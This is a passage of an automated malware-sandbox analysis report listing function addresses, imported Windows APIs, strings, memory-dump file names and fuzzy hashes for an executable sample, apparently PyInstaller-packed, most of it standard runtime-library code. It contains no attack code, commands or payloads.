                                                                                                                                                                                                                                                                    • Opcode ID: 16defea7d45dc340f891dcb1518e5bd63c50e449678e4b46de0281de23a8290b
                                                                                                                                                                                                                                                                    • Instruction ID: a2db8bfbd29879900fa33c3fe538a553dd620458a3a898985a0a024709da7d9b
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 16defea7d45dc340f891dcb1518e5bd63c50e449678e4b46de0281de23a8290b
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: CD219472619B8192E710AF50B8407E6A3A5AB88794F800135EECCA3B59DFBCD145C720
                                                                                                                                                                                                                                                                    Function 00007FF7C2679AF8 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 27libraryloaderCOMMON
                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000004.00000002.1720329401.00007FF7C2661000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7C2660000, based on PE: true
                                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1720292059.00007FF7C2660000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1720417432.00007FF7C268B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1720455917.00007FF7C269E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1720455917.00007FF7C26A2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1720520244.00007FF7C26A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_4_2_7ff7c2660000_X9g8L63QGs.jbxd
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID: AddressFreeHandleLibraryModuleProc
                                                                                                                                                                                                                                                                    • String ID: CorExitProcess$mscoree.dll
                                                                                                                                                                                                                                                                    • API String ID: 4061214504-1276376045
                                                                                                                                                                                                                                                                    • Opcode ID: 644f40749f2397ccfee8900b191f86882f652c7814ccefc594fcc00cef1e1075
                                                                                                                                                                                                                                                                    • Instruction ID: 72cf027ff2108743fd0f36c69c3f54dd6eae684aa761f21c900ad8ec229d2326
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 644f40749f2397ccfee8900b191f86882f652c7814ccefc594fcc00cef1e1075
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 1CF0C821B0970681EB10BF20E45537A9361AF45B71F940235C6EE56BF4DFACD044D330
                                                                                                                                                                                                                                                                    Function 00007FF7C26893D8 Relevance: 7.6, APIs: 5, Instructions: 56COMMONLIBRARYCODE
                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000004.00000002.1720329401.00007FF7C2661000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7C2660000, based on PE: true
                                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1720292059.00007FF7C2660000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1720417432.00007FF7C268B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1720455917.00007FF7C269E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1720455917.00007FF7C26A2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1720520244.00007FF7C26A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_4_2_7ff7c2660000_X9g8L63QGs.jbxd
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID: _set_statfp
                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                    • API String ID: 1156100317-0
                                                                                                                                                                                                                                                                    • Opcode ID: bce21d2362216a5e504affcf34f2858e363de54600403cac3d1eeb36cb2ab404
                                                                                                                                                                                                                                                                    • Instruction ID: 4066623134d92e573f96b82a735dc14fdfbc2894475c7fb6c164c0b88dd34629
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: bce21d2362216a5e504affcf34f2858e363de54600403cac3d1eeb36cb2ab404
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 6611BF62E0EA1381F765BD64D856376A0466F58370F840634EBEF26FD6CEACA841C330
                                                                                                                                                                                                                                                                    Function 00007FF7C267B400 Relevance: 7.6, APIs: 5, Instructions: 54COMMONLIBRARYCODE
                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                    • FlsGetValue.KERNEL32(?,?,?,00007FF7C267A613,?,?,00000000,00007FF7C267A8AE,?,?,?,?,?,00007FF7C267A83A), ref: 00007FF7C267B41F
                                                                                                                                                                                                                                                                    • FlsSetValue.KERNEL32(?,?,?,00007FF7C267A613,?,?,00000000,00007FF7C267A8AE,?,?,?,?,?,00007FF7C267A83A), ref: 00007FF7C267B43E
                                                                                                                                                                                                                                                                    • FlsSetValue.KERNEL32(?,?,?,00007FF7C267A613,?,?,00000000,00007FF7C267A8AE,?,?,?,?,?,00007FF7C267A83A), ref: 00007FF7C267B466
                                                                                                                                                                                                                                                                    • FlsSetValue.KERNEL32(?,?,?,00007FF7C267A613,?,?,00000000,00007FF7C267A8AE,?,?,?,?,?,00007FF7C267A83A), ref: 00007FF7C267B477
                                                                                                                                                                                                                                                                    • FlsSetValue.KERNEL32(?,?,?,00007FF7C267A613,?,?,00000000,00007FF7C267A8AE,?,?,?,?,?,00007FF7C267A83A), ref: 00007FF7C267B488
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000004.00000002.1720329401.00007FF7C2661000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7C2660000, based on PE: true
                                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1720292059.00007FF7C2660000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1720417432.00007FF7C268B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1720455917.00007FF7C269E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1720455917.00007FF7C26A2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1720520244.00007FF7C26A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_4_2_7ff7c2660000_X9g8L63QGs.jbxd
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID: Value
                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                    • API String ID: 3702945584-0
                                                                                                                                                                                                                                                                    • Opcode ID: e370891a427e995cf622d6c66c6ae617f18e5219a23357883517039299fedc16
                                                                                                                                                                                                                                                                    • Instruction ID: 0e5e7a931b28a25e0706fc9483b5e46d8a3d9439379cd7b3f91e67062d3625c4
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: e370891a427e995cf622d6c66c6ae617f18e5219a23357883517039299fedc16
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 76115920A0864281FA58BB317651179E1435FA4BB0F988335E8BD66FDADFACA441C730
                                                                                                                                                                                                                                                                    Function 00007FF7C267B294 Relevance: 7.6, APIs: 5, Instructions: 50COMMON
                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000004.00000002.1720329401.00007FF7C2661000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7C2660000, based on PE: true
                                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1720292059.00007FF7C2660000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1720417432.00007FF7C268B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1720455917.00007FF7C269E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1720455917.00007FF7C26A2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1720520244.00007FF7C26A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_4_2_7ff7c2660000_X9g8L63QGs.jbxd
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID: Value
                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                    • API String ID: 3702945584-0
                                                                                                                                                                                                                                                                    • Opcode ID: e449caa10890978289f0fc2f631dee428fb70040431ae2bf3103bb36de88fb08
                                                                                                                                                                                                                                                                    • Instruction ID: 4b2fa603d742e20771aaf7ab28afbb10a72be2bf362c1518ea8d2f621e279cf4
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: e449caa10890978289f0fc2f631dee428fb70040431ae2bf3103bb36de88fb08
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: F8113320A0920685FA68BE31246167A91434F55B30FE84735D8BE6ABC2DFACB881C771
                                                                                                                                                                                                                                                                    Function 00007FF7C2676010 Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 242COMMON
                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000004.00000002.1720329401.00007FF7C2661000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7C2660000, based on PE: true
                                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1720292059.00007FF7C2660000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1720417432.00007FF7C268B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1720455917.00007FF7C269E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1720455917.00007FF7C26A2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1720520244.00007FF7C26A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_4_2_7ff7c2660000_X9g8L63QGs.jbxd
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                                                                    • String ID: verbose
                                                                                                                                                                                                                                                                    • API String ID: 3215553584-579935070
                                                                                                                                                                                                                                                                    • Opcode ID: 8c3a45f75ca5c0a3459ca2e96ae2fbbf181a3d63a640e770f0a7cf37c7606cec
                                                                                                                                                                                                                                                                    • Instruction ID: b13c96d9389e21646e8d67393afa8a8b5dc76c55d7ac60490ffc2311014191d8
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 8c3a45f75ca5c0a3459ca2e96ae2fbbf181a3d63a640e770f0a7cf37c7606cec
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: BC91C132A08A4681E761BE28E45437DB792AB50FA4FC44131DADA63BD5DFBCE845C330
                                                                                                                                                                                                                                                                    Function 00007FF7C267FC38 Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 219COMMON
                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000004.00000002.1720329401.00007FF7C2661000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7C2660000, based on PE: true
                                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1720292059.00007FF7C2660000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1720417432.00007FF7C268B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1720455917.00007FF7C269E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1720455917.00007FF7C26A2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1720520244.00007FF7C26A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_4_2_7ff7c2660000_X9g8L63QGs.jbxd
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                                                                    • String ID: UTF-16LEUNICODE$UTF-8$ccs
                                                                                                                                                                                                                                                                    • API String ID: 3215553584-1196891531
                                                                                                                                                                                                                                                                    • Opcode ID: 4ea7f6e1ba59c177a711b7ec70ee344f27d005a52efb2894dd87f7f788f8515e
                                                                                                                                                                                                                                                                    • Instruction ID: 5787cecd535270cd647b1233ff93a89aeea2fe23a07d31759dde7606a359ad43
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 4ea7f6e1ba59c177a711b7ec70ee344f27d005a52efb2894dd87f7f788f8515e
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 4781E232D0820285F7A47E25A100A79B6A2AB11F68FE54035DA8DB7FC5DFEDE901C771
                                                                                                                                                                                                                                                                    Function 00007FF7C266D6B8 Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 154COMMON
                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000004.00000002.1720329401.00007FF7C2661000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7C2660000, based on PE: true
                                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1720292059.00007FF7C2660000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1720417432.00007FF7C268B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1720455917.00007FF7C269E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1720455917.00007FF7C26A2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1720520244.00007FF7C26A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_4_2_7ff7c2660000_X9g8L63QGs.jbxd
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID: CurrentImageNonwritableUnwind__except_validate_context_record
                                                                                                                                                                                                                                                                    • String ID: csm
                                                                                                                                                                                                                                                                    • API String ID: 2395640692-1018135373
                                                                                                                                                                                                                                                                    • Opcode ID: c7f5fdff7c0b40b6635b3f9850cf21a5be83d788788a684f503aa9329af71794
                                                                                                                                                                                                                                                                    • Instruction ID: 06d564a4ff99842d35e74d70095c4ee3a4553d9f847a11be92abbd181f581516
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: c7f5fdff7c0b40b6635b3f9850cf21a5be83d788788a684f503aa9329af71794
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 3051E53AB196428ADB14EF15D40963CB7A2FB44BA8F904134DACE57B84DFBCE841C724
                                                                                                                                                                                                                                                                    Function 00007FF7C266F2F8 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 146COMMON
                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000004.00000002.1720329401.00007FF7C2661000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7C2660000, based on PE: true
                                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1720292059.00007FF7C2660000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1720417432.00007FF7C268B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1720455917.00007FF7C269E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1720455917.00007FF7C26A2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1720520244.00007FF7C26A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_4_2_7ff7c2660000_X9g8L63QGs.jbxd
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID: Frame$EmptyHandler3::StateUnwind__except_validate_context_record
                                                                                                                                                                                                                                                                    • String ID: csm$csm
                                                                                                                                                                                                                                                                    • API String ID: 3896166516-3733052814
                                                                                                                                                                                                                                                                    • Opcode ID: 1b872e8f6993e9c5779cc40e3c84c693849f7921638dfce8d08fafba9ab8d571
                                                                                                                                                                                                                                                                    • Instruction ID: 13110e3e5d79b316df58c15630aea303bec253a8f69fa59d04f4e7ac4172666d
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 1b872e8f6993e9c5779cc40e3c84c693849f7921638dfce8d08fafba9ab8d571
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: B251D73251824286DB70AF219044368B7B1FB54BA4F985135DACE67F99CFBCE850C778
                                                                                                                                                                                                                                                                    Function 00007FF7C266EF48 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 146COMMON
                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000004.00000002.1720329401.00007FF7C2661000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7C2660000, based on PE: true
                                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1720292059.00007FF7C2660000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1720417432.00007FF7C268B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1720455917.00007FF7C269E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1720455917.00007FF7C26A2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1720520244.00007FF7C26A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_4_2_7ff7c2660000_X9g8L63QGs.jbxd
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID: CallEncodePointerTranslator
                                                                                                                                                                                                                                                                    • String ID: MOC$RCC
                                                                                                                                                                                                                                                                    • API String ID: 3544855599-2084237596
                                                                                                                                                                                                                                                                    • Opcode ID: 1984f943fe60021c6db05f5888f7dd086acc6d0e2a461e0c712dd9be4fa02006
                                                                                                                                                                                                                                                                    • Instruction ID: 380d14fc372b62f1084b5537e562cd8e5221759e4425f2a47c354dc0ef9f410f
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 1984f943fe60021c6db05f5888f7dd086acc6d0e2a461e0c712dd9be4fa02006
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 1B618C32918BC581E720AF15E4417AAF7A1FB94BE4F444225EADD13B95CFBCE190CB24
                                                                                                                                                                                                                                                                    Function 00007FF7C2667E10 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 81COMMON
                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                    • CreateDirectoryW.KERNEL32(00000000,?,00007FF7C266352C,?,00000000,00007FF7C2663F23), ref: 00007FF7C2667F22
                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000004.00000002.1720329401.00007FF7C2661000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7C2660000, based on PE: true
                                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1720292059.00007FF7C2660000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1720417432.00007FF7C268B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1720455917.00007FF7C269E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1720455917.00007FF7C26A2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1720520244.00007FF7C26A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_4_2_7ff7c2660000_X9g8L63QGs.jbxd
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID: CreateDirectory
                                                                                                                                                                                                                                                                    • String ID: %.*s$%s%c$\
                                                                                                                                                                                                                                                                    • API String ID: 4241100979-1685191245
                                                                                                                                                                                                                                                                    • Opcode ID: b1106a047486010b66b16d7d561c3e0e79f8eec2dc114c611d5a943da294bb6a
                                                                                                                                                                                                                                                                    • Instruction ID: b196924161bf0ec4b2190d38a47de716241255ffd9a057861788a08a29558063
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: b1106a047486010b66b16d7d561c3e0e79f8eec2dc114c611d5a943da294bb6a
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 5E31E921619AC145EA21AF21E4507AAE366EB84BF4F800231EE9D57FC9DE7CD505C734
                                                                                                                                                                                                                                                                    Function 00007FF7C2662810 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 65windowCOMMON
                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000004.00000002.1720329401.00007FF7C2661000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7C2660000, based on PE: true
                                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1720292059.00007FF7C2660000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1720417432.00007FF7C268B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1720455917.00007FF7C269E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1720455917.00007FF7C26A2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1720520244.00007FF7C26A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_4_2_7ff7c2660000_X9g8L63QGs.jbxd
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID: Message
                                                                                                                                                                                                                                                                    • String ID: ERROR$Error$[PYI-%d:%ls]
                                                                                                                                                                                                                                                                    • API String ID: 2030045667-255084403
                                                                                                                                                                                                                                                                    • Opcode ID: d0f77ace03032ad826a8cfca47aff52564341a40e7b1b64160a5aa56c6ce0663
                                                                                                                                                                                                                                                                    • Instruction ID: 0160224158223bd116642973b673956d0d3135a80895e48ead547f3b74eb2da5
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: d0f77ace03032ad826a8cfca47aff52564341a40e7b1b64160a5aa56c6ce0663
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 7E21A662708B4192E710AF24F8447EAB365EB88794F804136EECDA3B56EF7CD555C720
                                                                                                                                                                                                                                                                    Function 00007FF7C267C610 Relevance: 6.3, APIs: 4, Instructions: 299fileCOMMON
                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000004.00000002.1720329401.00007FF7C2661000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7C2660000, based on PE: true
                                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1720292059.00007FF7C2660000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1720417432.00007FF7C268B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1720455917.00007FF7C269E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1720455917.00007FF7C26A2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1720520244.00007FF7C26A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_4_2_7ff7c2660000_X9g8L63QGs.jbxd
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID: FileWrite$ConsoleErrorLastOutput
                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                    • API String ID: 2718003287-0
                                                                                                                                                                                                                                                                    • Opcode ID: 1ea6e931977968e7606fd026366deb17473f9f47aeaf25dd19fcfb7bb3399e1d
                                                                                                                                                                                                                                                                    • Instruction ID: 808846829a843145cf5868f0db15c03420e72cd35bafeaafaccb0e5e9df6ec03
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 1ea6e931977968e7606fd026366deb17473f9f47aeaf25dd19fcfb7bb3399e1d
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 48D11772B18B8189E710EF64E4402AC7772FB44BA8B818235DE9D67F89DF78D046C360
                                                                                                                                                                                                                                                                    Function 00007FF7C267F9FC Relevance: 6.2, APIs: 4, Instructions: 162COMMON
                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000004.00000002.1720329401.00007FF7C2661000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7C2660000, based on PE: true
                                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1720292059.00007FF7C2660000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1720417432.00007FF7C268B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1720455917.00007FF7C269E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1720455917.00007FF7C26A2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1720520244.00007FF7C26A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_4_2_7ff7c2660000_X9g8L63QGs.jbxd
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID: _get_daylight$_isindst
                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                    • API String ID: 4170891091-0
                                                                                                                                                                                                                                                                    • Opcode ID: 4d98307b2f9efdc6516e3695475c092fba069f5f92b05f4e8f1f7e1348ba3a44
